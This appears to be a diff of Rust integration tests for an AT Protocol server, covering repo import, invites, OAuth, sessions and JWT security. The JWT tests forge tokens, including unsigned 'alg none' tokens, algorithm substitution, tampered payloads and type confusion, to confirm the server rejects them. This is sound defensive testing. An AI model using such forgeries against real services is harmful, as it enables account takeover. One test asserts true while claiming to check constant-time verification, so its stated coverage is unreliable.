use reqwest::StatusCode;
5
use serde_json::json;
6
+
7
#[tokio::test]
8
async fn test_import_repo_requires_auth() {
9
let client = client();
···
16
.expect("Request failed");
17
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
18
}
19
+
20
#[tokio::test]
21
async fn test_import_repo_invalid_car() {
22
let client = client();
···
33
let body: serde_json::Value = res.json().await.unwrap();
34
assert_eq!(body["error"], "InvalidRequest");
35
}
36
+
37
#[tokio::test]
38
async fn test_import_repo_empty_body() {
39
let client = client();
···
48
.expect("Request failed");
49
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
50
}
51
+
52
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
53
loop {
54
let mut byte = (value & 0x7F) as u8;
···
62
}
63
}
64
}
65
+
66
#[tokio::test]
67
async fn test_import_rejects_car_for_different_user() {
68
let client = client();
···
95
body
96
);
97
}
98
+
99
#[tokio::test]
100
async fn test_import_accepts_own_exported_repo() {
101
let client = client();
···
141
.expect("Failed to import repo");
142
assert_eq!(import_res.status(), StatusCode::OK);
143
}
144
+
145
#[tokio::test]
146
async fn test_import_repo_size_limit() {
147
let client = client();
···
172
}
173
}
174
}
175
+
176
#[tokio::test]
177
async fn test_import_deactivated_account_rejected() {
178
let client = client();
···
213
import_res.status()
214
);
215
}
216
+
217
#[tokio::test]
218
async fn test_import_invalid_car_structure() {
219
let client = client();
···
229
.expect("Request failed");
230
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
231
}
232
+
233
#[tokio::test]
234
async fn test_import_car_with_no_roots() {
235
let client = client();
···
251
let body: serde_json::Value = res.json().await.unwrap();
252
assert_eq!(body["error"], "InvalidRequest");
253
}
254
+
255
#[tokio::test]
256
async fn test_import_preserves_records_after_reimport() {
257
let client = client();
+8
tests/import_with_verification.rs
···
11
use std::collections::BTreeMap;
12
use wiremock::matchers::{method, path};
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
+
15
fn make_cid(data: &[u8]) -> Cid {
16
let mut hasher = Sha256::new();
17
hasher.update(data);
···
19
let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
20
Cid::new_v1(0x71, multihash)
21
}
22
+
23
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
24
loop {
25
let mut byte = (value & 0x7F) as u8;
···
33
}
34
}
35
}
36
+
37
fn encode_car_block(cid: &Cid, data: &[u8]) -> Vec<u8> {
38
let cid_bytes = cid.to_bytes();
39
let mut result = Vec::new();
···
42
result.extend_from_slice(data);
43
result
44
}
45
+
46
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
47
let public_key = signing_key.verifying_key();
48
let compressed = public_key.to_sec1_bytes();
···
59
buf.extend_from_slice(&compressed);
60
multibase::encode(multibase::Base::Base58Btc, buf)
61
}
62
+
63
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value {
64
let multikey = get_multikey_from_signing_key(signing_key);
65
json!({
···
82
}]
83
})
84
}
85
+
86
fn create_signed_commit(
87
did: &str,
88
data_cid: &Cid,
···
112
let cid = make_cid(&signed_bytes);
113
(signed_bytes, cid)
114
}
115
+
116
fn create_mst_node(entries: Vec<(String, Cid)>) -> (Vec<u8>, Cid) {
117
let ipld_entries: Vec<Ipld> = entries
118
.into_iter()
···
131
let cid = make_cid(&bytes);
132
(bytes, cid)
133
}
134
+
135
fn create_record() -> (Vec<u8>, Cid) {
136
let record = Ipld::Map(BTreeMap::from([
137
("$type".to_string(), Ipld::String("app.bsky.feed.post".to_string())),
+10
tests/invite.rs
···
2
use common::*;
3
use reqwest::StatusCode;
4
use serde_json::{Value, json};
5
+
6
#[tokio::test]
7
async fn test_create_invite_code_success() {
8
let client = client();
···
27
assert!(!code.is_empty());
28
assert!(code.contains('-'), "Code should be a UUID format");
29
}
30
+
31
#[tokio::test]
32
async fn test_create_invite_code_no_auth() {
33
let client = client();
···
47
let body: Value = res.json().await.expect("Response was not valid JSON");
48
assert_eq!(body["error"], "AuthenticationRequired");
49
}
50
+
51
#[tokio::test]
52
async fn test_create_invite_code_invalid_use_count() {
53
let client = client();
···
69
let body: Value = res.json().await.expect("Response was not valid JSON");
70
assert_eq!(body["error"], "InvalidRequest");
71
}
72
+
73
#[tokio::test]
74
async fn test_create_invite_code_for_another_account() {
75
let client = client();
···
93
let body: Value = res.json().await.expect("Response was not valid JSON");
94
assert!(body["code"].is_string());
95
}
96
+
97
#[tokio::test]
98
async fn test_create_invite_codes_success() {
99
let client = client();
···
119
assert_eq!(codes.len(), 1);
120
assert_eq!(codes[0]["codes"].as_array().unwrap().len(), 3);
121
}
122
+
123
#[tokio::test]
124
async fn test_create_invite_codes_for_multiple_accounts() {
125
let client = client();
···
149
assert_eq!(code_obj["codes"].as_array().unwrap().len(), 2);
150
}
151
}
152
+
153
#[tokio::test]
154
async fn test_create_invite_codes_no_auth() {
155
let client = client();
···
167
.expect("Failed to send request");
168
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
169
}
170
+
171
#[tokio::test]
172
async fn test_get_account_invite_codes_success() {
173
let client = client();
···
206
assert!(code["createdAt"].is_string());
207
assert!(code["uses"].is_array());
208
}
209
+
210
#[tokio::test]
211
async fn test_get_account_invite_codes_no_auth() {
212
let client = client();
···
220
.expect("Failed to send request");
221
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
222
}
223
+
224
#[tokio::test]
225
async fn test_get_account_invite_codes_include_used_filter() {
226
let client = client();
+43
tests/jwt_security.rs
···
15
use reqwest::StatusCode;
16
use serde_json::{json, Value};
17
use sha2::{Digest, Sha256};
18
+
19
fn generate_user_key() -> Vec<u8> {
20
let secret_key = SecretKey::random(&mut OsRng);
21
secret_key.to_bytes().to_vec()
22
}
23
+
24
fn create_custom_jwt(header: &Value, claims: &Value, key_bytes: &[u8]) -> String {
25
let signing_key = SigningKey::from_slice(key_bytes).expect("valid key");
26
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
···
30
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
31
format!("{}.{}", message, signature_b64)
32
}
33
+
34
fn create_unsigned_jwt(header: &Value, claims: &Value) -> String {
35
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
36
let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(claims).unwrap());
37
format!("{}.{}.", header_b64, claims_b64)
38
}
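As a sketch of how these helpers combine in the algorithm-downgrade test below; the claims here are illustrative, the real test builds its own set inside the collapsed hunk.
// Hypothetical claims; any verifier must refuse a token whose header says "alg": "none".
let header = json!({ "alg": "none", "typ": "JWT" });
let claims = json!({ "sub": "did:plc:example", "scope": "com.atproto.access" });
let forged = create_unsigned_jwt(&header, &claims);
assert!(verify_access_token(&forged, &generate_user_key()).is_err());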
39
+
40
#[test]
41
fn test_jwt_security_forged_signature_rejected() {
42
let key_bytes = generate_user_key();
···
50
let err_msg = result.err().unwrap().to_string();
51
assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg);
52
}
53
+
54
#[test]
55
fn test_jwt_security_modified_payload_rejected() {
56
let key_bytes = generate_user_key();
···
65
let result = verify_access_token(&modified_token, &key_bytes);
66
assert!(result.is_err(), "Modified payload must be rejected");
67
}
68
+
69
#[test]
70
fn test_jwt_security_algorithm_none_attack_rejected() {
71
let key_bytes = generate_user_key();
···
87
let result = verify_access_token(&malicious_token, &key_bytes);
88
assert!(result.is_err(), "Algorithm 'none' attack must be rejected");
89
}
90
+
91
#[test]
92
fn test_jwt_security_algorithm_substitution_hs256_rejected() {
93
let key_bytes = generate_user_key();
···
118
let result = verify_access_token(&malicious_token, &key_bytes);
119
assert!(result.is_err(), "HS256 algorithm substitution must be rejected");
120
}
121
+
122
#[test]
123
fn test_jwt_security_algorithm_substitution_rs256_rejected() {
124
let key_bytes = generate_user_key();
···
143
let result = verify_access_token(&malicious_token, &key_bytes);
144
assert!(result.is_err(), "RS256 algorithm substitution must be rejected");
145
}
146
+
147
#[test]
148
fn test_jwt_security_algorithm_substitution_es256_rejected() {
149
let key_bytes = generate_user_key();
···
168
let result = verify_access_token(&malicious_token, &key_bytes);
169
assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)");
170
}
171
+
172
#[test]
173
fn test_jwt_security_token_type_confusion_refresh_as_access() {
174
let key_bytes = generate_user_key();
···
179
let err_msg = result.err().unwrap().to_string();
180
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
181
}
182
+
183
#[test]
184
fn test_jwt_security_token_type_confusion_access_as_refresh() {
185
let key_bytes = generate_user_key();
···
190
let err_msg = result.err().unwrap().to_string();
191
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
192
}
193
+
194
#[test]
195
fn test_jwt_security_token_type_confusion_service_as_access() {
196
let key_bytes = generate_user_key();
···
200
let result = verify_access_token(&service_token, &key_bytes);
201
assert!(result.is_err(), "Service token must not be accepted as access token");
202
}
203
+
204
#[test]
205
fn test_jwt_security_scope_manipulation_attack() {
206
let key_bytes = generate_user_key();
···
224
let err_msg = result.err().unwrap().to_string();
225
assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg);
226
}
227
+
228
#[test]
229
fn test_jwt_security_empty_scope_rejected() {
230
let key_bytes = generate_user_key();
···
246
let result = verify_access_token(&token, &key_bytes);
247
assert!(result.is_err(), "Empty scope must be rejected for access tokens");
248
}
249
+
250
#[test]
251
fn test_jwt_security_missing_scope_rejected() {
252
let key_bytes = generate_user_key();
···
267
let result = verify_access_token(&token, &key_bytes);
268
assert!(result.is_err(), "Missing scope must be rejected for access tokens");
269
}
270
+
271
#[test]
272
fn test_jwt_security_expired_token_rejected() {
273
let key_bytes = generate_user_key();
···
291
let err_msg = result.err().unwrap().to_string();
292
assert!(err_msg.contains("expired"), "Error: {}", err_msg);
293
}
294
+
295
#[test]
296
fn test_jwt_security_future_iat_accepted() {
297
let key_bytes = generate_user_key();
···
313
let result = verify_access_token(&token, &key_bytes);
314
assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance");
315
}
316
+
317
#[test]
318
fn test_jwt_security_cross_user_key_attack() {
319
let key_bytes_user1 = generate_user_key();
···
323
let result = verify_access_token(&token, &key_bytes_user2);
324
assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key");
325
}
326
+
327
#[test]
328
fn test_jwt_security_signature_truncation_rejected() {
329
let key_bytes = generate_user_key();
···
336
let result = verify_access_token(&truncated_token, &key_bytes);
337
assert!(result.is_err(), "Truncated signature must be rejected");
338
}
339
+
340
#[test]
341
fn test_jwt_security_signature_extension_rejected() {
342
let key_bytes = generate_user_key();
···
350
let result = verify_access_token(&extended_token, &key_bytes);
351
assert!(result.is_err(), "Extended signature must be rejected");
352
}
353
+
354
#[test]
355
fn test_jwt_security_malformed_tokens_rejected() {
356
let key_bytes = generate_user_key();
···
373
if token.len() > 40 { &token[..40] } else { token });
374
}
375
}
376
+
377
#[test]
378
fn test_jwt_security_missing_required_claims_rejected() {
379
let key_bytes = generate_user_key();
···
411
assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim);
412
}
413
}
414
+
415
#[test]
416
fn test_jwt_security_invalid_header_json_rejected() {
417
let key_bytes = generate_user_key();
···
422
let result = verify_access_token(&malicious_token, &key_bytes);
423
assert!(result.is_err(), "Invalid header JSON must be rejected");
424
}
425
+
426
#[test]
427
fn test_jwt_security_invalid_claims_json_rejected() {
428
let key_bytes = generate_user_key();
···
433
let result = verify_access_token(&malicious_token, &key_bytes);
434
assert!(result.is_err(), "Invalid claims JSON must be rejected");
435
}
436
+
437
#[test]
438
fn test_jwt_security_header_injection_attack() {
439
let key_bytes = generate_user_key();
···
457
let result = verify_access_token(&token, &key_bytes);
458
assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)");
459
}
460
+
461
#[test]
462
fn test_jwt_security_claims_type_confusion() {
463
let key_bytes = generate_user_key();
···
478
let result = verify_access_token(&token, &key_bytes);
479
assert!(result.is_err(), "Claims with wrong types must be rejected");
480
}
481
+
482
#[test]
483
fn test_jwt_security_unicode_injection_in_claims() {
484
let key_bytes = generate_user_key();
···
502
assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected");
503
}
504
}
505
+
506
#[test]
507
fn test_jwt_security_signature_verification_is_constant_time() {
508
let key_bytes = generate_user_key();
···
519
let _result2 = verify_access_token(&completely_invalid_token, &key_bytes);
520
assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)");
521
}
522
+
523
#[test]
524
fn test_jwt_security_valid_scopes_accepted() {
525
let key_bytes = generate_user_key();
···
548
assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope);
549
}
550
}
551
+
552
#[test]
553
fn test_jwt_security_refresh_token_scope_rejected_as_access() {
554
let key_bytes = generate_user_key();
···
570
let result = verify_access_token(&token, &key_bytes);
571
assert!(result.is_err(), "Refresh scope with access token type must be rejected");
572
}
573
+
574
#[test]
575
fn test_jwt_security_get_did_extraction_safe() {
576
let key_bytes = generate_user_key();
···
588
let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe");
589
assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)");
590
}
591
+
592
#[test]
593
fn test_jwt_security_get_jti_extraction_safe() {
594
let key_bytes = generate_user_key();
···
604
let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
605
assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error");
606
}
607
+
608
#[test]
609
fn test_jwt_security_key_from_invalid_bytes_rejected() {
610
let invalid_keys: Vec<&[u8]> = vec![
···
624
}
625
}
626
}
627
+
628
#[test]
629
fn test_jwt_security_boundary_exp_values() {
630
let key_bytes = generate_user_key();
···
658
let result2 = verify_access_token(&token2, &key_bytes);
659
assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable");
660
}
661
+
662
#[test]
663
fn test_jwt_security_very_long_exp_handled() {
664
let key_bytes = generate_user_key();
···
679
let token = create_custom_jwt(&header, &claims, &key_bytes);
680
let _result = verify_access_token(&token, &key_bytes);
681
}
682
+
683
#[test]
684
fn test_jwt_security_negative_timestamps_handled() {
685
let key_bytes = generate_user_key();
···
700
let token = create_custom_jwt(&header, &claims, &key_bytes);
701
let _result = verify_access_token(&token, &key_bytes);
702
}
703
+
704
#[tokio::test]
705
async fn test_jwt_security_server_rejects_forged_session_token() {
706
let url = base_url().await;
···
716
.unwrap();
717
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected");
718
}
719
+
720
#[tokio::test]
721
async fn test_jwt_security_server_rejects_expired_token() {
722
let url = base_url().await;
···
736
.unwrap();
737
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected");
738
}
739
+
740
#[tokio::test]
741
async fn test_jwt_security_server_rejects_tampered_did() {
742
let url = base_url().await;
···
757
.unwrap();
758
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected");
759
}
760
+
761
#[tokio::test]
762
async fn test_jwt_security_refresh_token_replay_protection() {
763
let url = base_url().await;
···
820
.unwrap();
821
assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected");
822
}
823
+
824
#[tokio::test]
825
async fn test_jwt_security_authorization_header_formats() {
826
let url = base_url().await;
···
862
.unwrap();
863
assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected");
864
}
865
+
866
#[tokio::test]
867
async fn test_jwt_security_deleted_session_rejected() {
868
let url = base_url().await;
···
890
.unwrap();
891
assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout");
892
}
893
+
894
#[tokio::test]
895
async fn test_jwt_security_deactivated_account_rejected() {
896
let url = base_url().await;
+23
tests/lifecycle_record.rs
···
6
use reqwest::{StatusCode, header};
7
use serde_json::{Value, json};
8
use std::time::Duration;
9
+
10
#[tokio::test]
11
async fn test_post_crud_lifecycle() {
12
let client = client();
···
156
"Record was found, but it should be deleted"
157
);
158
}
159
+
160
#[tokio::test]
161
async fn test_record_update_conflict_lifecycle() {
162
let client = client();
···
282
"v3 (good) update failed"
283
);
284
}
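The v2/v3 conflict here presumably goes through the compare-and-swap parameters that com.atproto.repo.putRecord exposes; a generic sketch of such a request per the public lexicon, with placeholder values rather than the collapsed test body:
// swapRecord carries the CID the caller believes is current; per the lexicon,
// a mismatch is rejected (typically surfaced as an InvalidSwap error).
let put_body = json!({
    "repo": "did:plc:example",
    "collection": "app.bsky.feed.post",
    "rkey": "examplerkey",
    "record": { "$type": "app.bsky.feed.post", "text": "v2", "createdAt": "2024-01-01T00:00:00Z" },
    "swapRecord": "bafy-placeholder-stale-cid"
});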
285
+
286
#[tokio::test]
287
async fn test_profile_lifecycle() {
288
let client = client();
···
365
let updated_body: Value = get_updated_res.json().await.unwrap();
366
assert_eq!(updated_body["value"]["displayName"], "Updated User");
367
}
368
+
369
#[tokio::test]
370
async fn test_reply_thread_lifecycle() {
371
let client = client();
···
461
.expect("Failed to create nested reply");
462
assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply");
463
}
464
+
465
#[tokio::test]
466
async fn test_blob_in_record_lifecycle() {
467
let client = client();
···
519
let profile: Value = get_res.json().await.unwrap();
520
assert!(profile["value"]["avatar"]["ref"]["$link"].is_string());
521
}
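The avatar field asserted on above is an AT Protocol blob reference; a minimal sketch of its JSON shape (CID, MIME type, and size are placeholders):
let avatar = json!({
    "$type": "blob",
    "ref": { "$link": "bafkrei-placeholder-cid" },
    "mimeType": "image/png",
    "size": 12345
});
assert!(avatar["ref"]["$link"].is_string());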
522
+
523
#[tokio::test]
524
async fn test_authorization_cannot_modify_other_repo() {
525
let client = client();
···
551
res.status()
552
);
553
}
554
+
555
#[tokio::test]
556
async fn test_authorization_cannot_delete_other_record() {
557
let client = client();
···
594
.expect("Failed to verify record exists");
595
assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist");
596
}
597
+
598
#[tokio::test]
599
async fn test_apply_writes_batch_lifecycle() {
600
let client = client();
···
755
"Batch-deleted post should be gone"
756
);
757
}
758
+
759
async fn create_post_with_rkey(
760
client: &reqwest::Client,
761
did: &str,
···
790
body["cid"].as_str().unwrap().to_string(),
791
)
792
}
793
+
794
#[tokio::test]
795
async fn test_list_records_default_order() {
796
let client = client();
···
822
.collect();
823
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
824
}
825
+
826
#[tokio::test]
827
async fn test_list_records_reverse_true() {
828
let client = client();
···
854
.collect();
855
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
856
}
857
+
858
#[tokio::test]
859
async fn test_list_records_cursor_pagination() {
860
let client = client();
···
907
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
908
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
909
}
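A sketch of the page loop this test exercises, with endpoint and parameter names taken from com.atproto.repo.listRecords; the base URL, DID, collection, and page size are illustrative:
// Walk every page until the server stops returning a cursor.
async fn collect_all_uris(client: &reqwest::Client, base: &str, did: &str) -> Vec<String> {
    let mut uris = Vec::new();
    let mut cursor: Option<String> = None;
    loop {
        let mut req = client
            .get(format!("{}/xrpc/com.atproto.repo.listRecords", base))
            .query(&[("repo", did), ("collection", "app.bsky.feed.post"), ("limit", "2")]);
        if let Some(c) = &cursor {
            req = req.query(&[("cursor", c.as_str())]);
        }
        let body: Value = req.send().await.unwrap().json().await.unwrap();
        for record in body["records"].as_array().unwrap() {
            uris.push(record["uri"].as_str().unwrap().to_string());
        }
        match body["cursor"].as_str() {
            Some(c) => cursor = Some(c.to_string()),
            None => break, // no cursor means this was the last page
        }
    }
    uris
}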
910
+
911
#[tokio::test]
912
async fn test_list_records_rkey_start() {
913
let client = client();
···
941
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
942
}
943
}
944
+
945
#[tokio::test]
946
async fn test_list_records_rkey_end() {
947
let client = client();
···
975
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
976
}
977
}
978
+
979
#[tokio::test]
980
async fn test_list_records_rkey_range() {
981
let client = client();
···
1012
}
1013
assert!(!rkeys.is_empty(), "Should have at least some records in range");
1014
}
1015
+
1016
#[tokio::test]
1017
async fn test_list_records_limit_clamping_max() {
1018
let client = client();
···
1038
let records = body["records"].as_array().unwrap();
1039
assert!(records.len() <= 100, "Limit should be clamped to max 100");
1040
}
1041
+
1042
#[tokio::test]
1043
async fn test_list_records_limit_clamping_min() {
1044
let client = client();
···
1062
let records = body["records"].as_array().unwrap();
1063
assert!(records.len() >= 1, "Limit should be clamped to min 1");
1064
}
1065
+
1066
#[tokio::test]
1067
async fn test_list_records_empty_collection() {
1068
let client = client();
···
1085
assert!(records.is_empty(), "Empty collection should return empty array");
1086
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
1087
}
1088
+
1089
#[tokio::test]
1090
async fn test_list_records_exact_limit() {
1091
let client = client();
···
1111
let records = body["records"].as_array().unwrap();
1112
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
1113
}
1114
+
1115
#[tokio::test]
1116
async fn test_list_records_cursor_exhaustion() {
1117
let client = client();
···
1137
let records = body["records"].as_array().unwrap();
1138
assert_eq!(records.len(), 3);
1139
}
1140
+
1141
#[tokio::test]
1142
async fn test_list_records_repo_not_found() {
1143
let client = client();
···
1155
.expect("Failed to list records");
1156
assert_eq!(res.status(), StatusCode::NOT_FOUND);
1157
}
1158
+
1159
#[tokio::test]
1160
async fn test_list_records_includes_cid() {
1161
let client = client();
···
1184
assert!(cid.starts_with("bafy"), "CID should be valid");
1185
}
1186
}
1187
+
1188
#[tokio::test]
1189
async fn test_list_records_cursor_with_reverse() {
1190
let client = client();
+7
tests/lifecycle_session.rs
···
use chrono::Utc;
6
use reqwest::StatusCode;
7
use serde_json::{Value, json};
8
+
9
#[tokio::test]
10
async fn test_session_lifecycle_wrong_password() {
11
let client = client();
···
29
res.status()
30
);
31
}
32
+
33
#[tokio::test]
34
async fn test_session_lifecycle_multiple_sessions() {
35
let client = client();
···
105
.expect("Failed getSession 2");
106
assert_eq!(get2.status(), StatusCode::OK);
107
}
108
+
109
#[tokio::test]
110
async fn test_session_lifecycle_refresh_invalidates_old() {
111
let client = client();
···
172
"Old refresh token should be invalid after use"
173
);
174
}
175
+
176
#[tokio::test]
177
async fn test_app_password_lifecycle() {
178
let client = client();
···
279
let passwords_after = list_after["passwords"].as_array().unwrap();
280
assert_eq!(passwords_after.len(), 0, "No app passwords should remain");
281
}
282
+
283
#[tokio::test]
284
async fn test_account_deactivation_lifecycle() {
285
let client = client();
···
367
let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await;
368
assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation");
369
}
370
+
371
#[tokio::test]
372
async fn test_service_auth_lifecycle() {
373
let client = client();
···
399
assert_eq!(claims["aud"], "did:web:api.bsky.app");
400
assert_eq!(claims["lxm"], "com.atproto.repo.uploadBlob");
401
}
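The two claims checked here are the heart of AT Protocol service auth: aud is the DID of the service the token is minted for, and lxm pins the token to a single XRPC method. A minimal sketch of extracting those claims from the returned JWT (assumes the base64 crate, which the other test files in this suite already use):
fn service_jwt_claims(token: &str) -> Value {
    use base64::Engine as _; // brings the decode method into scope
    let claims_b64 = token.split('.').nth(1).expect("JWT has three segments");
    let bytes = base64::engine::general_purpose::URL_SAFE_NO_PAD
        .decode(claims_b64)
        .expect("claims segment is base64url");
    serde_json::from_slice(&bytes).expect("claims are JSON")
}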
402
+
403
#[tokio::test]
404
async fn test_request_account_delete() {
405
let client = client();
+1
tests/moderation.rs
+4
tests/notifications.rs
···
4
NotificationStatus, NotificationType,
5
};
6
use sqlx::PgPool;
7
+
8
async fn get_pool() -> PgPool {
9
let conn_str = common::get_db_connection_string().await;
10
sqlx::postgres::PgPoolOptions::new()
···
13
.await
14
.expect("Failed to connect to test database")
15
}
16
+
17
#[tokio::test]
18
async fn test_enqueue_notification() {
19
let pool = get_pool().await;
···
55
assert_eq!(row.notification_type, NotificationType::Welcome);
56
assert_eq!(row.status, NotificationStatus::Pending);
57
}
58
+
59
#[tokio::test]
60
async fn test_enqueue_welcome() {
61
let pool = get_pool().await;
···
85
assert!(row.body.contains(&format!("@{}", user_row.handle)));
86
assert_eq!(row.notification_type, NotificationType::Welcome);
87
}
88
+
89
#[tokio::test]
90
async fn test_notification_queue_status_index() {
91
let pool = get_pool().await;
+3
tests/oauth.rs
···
8
use sha2::{Digest, Sha256};
9
use wiremock::{Mock, MockServer, ResponseTemplate};
10
use wiremock::matchers::{method, path};
11
+
12
fn no_redirect_client() -> reqwest::Client {
13
reqwest::Client::builder()
14
.redirect(redirect::Policy::none())
15
.build()
16
.unwrap()
17
}
18
+
19
fn generate_pkce() -> (String, String) {
20
let verifier_bytes: [u8; 32] = rand::random();
21
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
25
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
26
(code_verifier, code_challenge)
27
}
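generate_pkce implements the S256 method from RFC 7636: the challenge is the unpadded base64url encoding of the SHA-256 of the verifier. A quick self-check using the imports already in this file:
let (verifier, challenge) = generate_pkce();
let recomputed = URL_SAFE_NO_PAD.encode(Sha256::digest(verifier.as_bytes()));
assert_eq!(challenge, recomputed, "S256: challenge = b64url(sha256(verifier))");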
28
+
29
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
30
let mock_server = MockServer::start().await;
31
let client_id = mock_server.uri();
+18
tests/oauth_lifecycle.rs
···
1
mod common;
2
mod helpers;
3
+
4
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
5
use chrono::Utc;
6
use common::{base_url, client};
···
10
use sha2::{Digest, Sha256};
11
use wiremock::{Mock, MockServer, ResponseTemplate};
12
use wiremock::matchers::{method, path};
13
+
14
fn generate_pkce() -> (String, String) {
15
let verifier_bytes: [u8; 32] = rand::random();
16
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
20
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
21
(code_verifier, code_challenge)
22
}
23
+
24
fn no_redirect_client() -> reqwest::Client {
25
reqwest::Client::builder()
26
.redirect(redirect::Policy::none())
27
.build()
28
.unwrap()
29
}
30
+
31
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
32
let mock_server = MockServer::start().await;
33
let client_id = mock_server.uri();
···
47
.await;
48
mock_server
49
}
50
+
51
struct OAuthSession {
52
access_token: String,
53
refresh_token: String,
54
did: String,
55
client_id: String,
56
}
57
+
58
async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) {
59
let url = base_url().await;
60
let http_client = client();
···
131
};
132
(session, mock_client)
133
}
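One detail worth noting for the tests below: the returned MockServer has to stay bound for the life of the test, because wiremock shuts the mock client-metadata endpoint down when the guard is dropped. Illustrative usage, with a placeholder handle prefix and redirect URI:
// Keep `_mock_client` in scope; dropping it stops the mock client-metadata server.
let (session, _mock_client) =
    create_user_and_oauth_session("alice", "https://app.example/callback").await;
assert!(!session.access_token.is_empty());
assert!(session.did.starts_with("did:"));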
134
+
135
#[tokio::test]
136
async fn test_oauth_token_can_create_and_read_records() {
137
let url = base_url().await;
···
176
let get_body: Value = get_res.json().await.unwrap();
177
assert_eq!(get_body["value"]["text"], post_text);
178
}
179
+
180
#[tokio::test]
181
async fn test_oauth_token_can_upload_blob() {
182
let url = base_url().await;
···
199
assert!(upload_body["blob"]["ref"]["$link"].is_string());
200
assert_eq!(upload_body["blob"]["mimeType"], "text/plain");
201
}
202
+
203
#[tokio::test]
204
async fn test_oauth_token_can_describe_repo() {
205
let url = base_url().await;
···
220
assert_eq!(describe_body["did"], session.did);
221
assert!(describe_body["handle"].is_string());
222
}
223
+
224
#[tokio::test]
225
async fn test_oauth_full_post_lifecycle_create_edit_delete() {
226
let url = base_url().await;
···
310
get_deleted_res.status()
311
);
312
}
313
+
314
#[tokio::test]
315
async fn test_oauth_batch_operations_apply_writes() {
316
let url = base_url().await;
···
378
let records = list_body["records"].as_array().unwrap();
379
assert!(records.len() >= 3, "Should have at least 3 records from batch");
380
}
381
+
382
#[tokio::test]
383
async fn test_oauth_token_refresh_maintains_access() {
384
let url = base_url().await;
···
449
let records = list_body["records"].as_array().unwrap();
450
assert_eq!(records.len(), 2, "Should have both posts");
451
}
452
+
453
#[tokio::test]
454
async fn test_oauth_revoked_token_cannot_access_resources() {
455
let url = base_url().await;
···
494
.unwrap();
495
assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work");
496
}
497
+
498
#[tokio::test]
499
async fn test_oauth_multiple_clients_same_user() {
500
let url = base_url().await;
···
654
let records = list_body["records"].as_array().unwrap();
655
assert_eq!(records.len(), 2, "Both posts should be visible to either client");
656
}
657
+
658
#[tokio::test]
659
async fn test_oauth_social_interactions_follow_like_repost() {
660
let url = base_url().await;
···
772
let likes = likes_body["records"].as_array().unwrap();
773
assert_eq!(likes.len(), 1, "Bob should have 1 like");
774
}
775
+
776
#[tokio::test]
777
async fn test_oauth_cannot_modify_other_users_repo() {
778
let url = base_url().await;
···
820
let posts = posts_body["records"].as_array().unwrap();
821
assert_eq!(posts.len(), 0, "Alice's repo should have no posts from Bob");
822
}
823
+
824
#[tokio::test]
825
async fn test_oauth_session_isolation_between_users() {
826
let url = base_url().await;
···
895
assert_eq!(bob_posts.len(), 1);
896
